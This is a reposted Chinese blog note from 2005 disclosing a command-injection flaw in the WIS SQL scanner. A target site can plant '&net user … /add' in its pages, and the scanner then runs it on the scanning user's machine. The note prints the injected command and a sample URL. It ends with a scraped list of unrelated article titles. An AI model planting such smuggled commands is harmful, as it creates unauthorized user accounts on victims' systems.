小榕的WIS漏洞(ALLyeSNO) 【补充一下】
来源:互联网 发布:淘宝客返利网制作 编辑:程序博客网 时间:2024/04/30 19:00
Term : FreeXploiT
Author : ALLyeSNO
Date : 2005-2-2
WIS是小榕开发的SQL漏洞扫描工具
WIS对&字符未做严格过滤 导致可以 人为的创建含&字符的语句 在扫描者机子上执行任意代码
&net user allyesno 12345 /add
不是wis&net user allyesno 12345 /add
而是 使用 wis对 某一个网站进行扫描的时候
我们可以利用wis未过滤& 在被扫描的网站代码 例如asp代码中嵌入&net user administrator 12345 /add
当wis对它进行扫描的时候 结果如下
http://www.target.com/sqlbug?=sql&net user administrator 12345 /add
本地执行wis &net user allyesno 12345 /add 是肯定可以的 因为&是把两段指令连在一起执行
- 小榕的WIS漏洞(ALLyeSNO) 【补充一下】
- 天涯网站跨站漏洞(ALLyeSNO)
- 补充一下嵌入式的基础知识
- 关于WIS资源的初探
- wed于wis的应用
- Webdav漏洞ISNO方法的补充
- 测井曲线wis文件格式转换为ASCII文本格式小软件的开发(C与Python结合开发)
- 补充一下PES的包结构
- 发现多个远程控制服务 可欺骗漏洞(ALLyeSNO)
- IOS的小知识点补充
- GCD的一点小补充
- 北邮人论坛的小漏洞
- 补充一下历史
- 解决RMVB 分割软件的bug(ALLyeSNO)
- md s.../ 的其他一些用法(ALLyeSNO)
- 打造不完美的超级帐号(ALLyeSNO)
- 逃过杀毒软件的法眼【ALLyeSNO】
- 补充一下有关XFS Manager的内存管理部分
- C/C++ 开发人员:充实您的 XML 工具箱
- j2sdk1.4.0中bin子目录下各程序的参数用法
- 集成可移植 XML 数据与可移植 C/C++ 代码
- 朋友发了一篇关于接口跟抽象类的文章,觉得不错收藏一下
- 费德勒:这一天你用顽强征服了你不曾用胜利征服的这世界
- 小榕的WIS漏洞(ALLyeSNO) 【补充一下】
- [备忘录] Windows版本Oracle中添加操作系统认证用户的步骤
- 如何让IIS5.0 与Tomcat 5.0真正的协同工作(原创)
- 一个真正的网页软键盘
- Symbian Programming Resource
- 带24节气的月历控件
- 网页效果集合
- SWT與SWING三言兩語
- 颜 色 英 文 代 码 全 集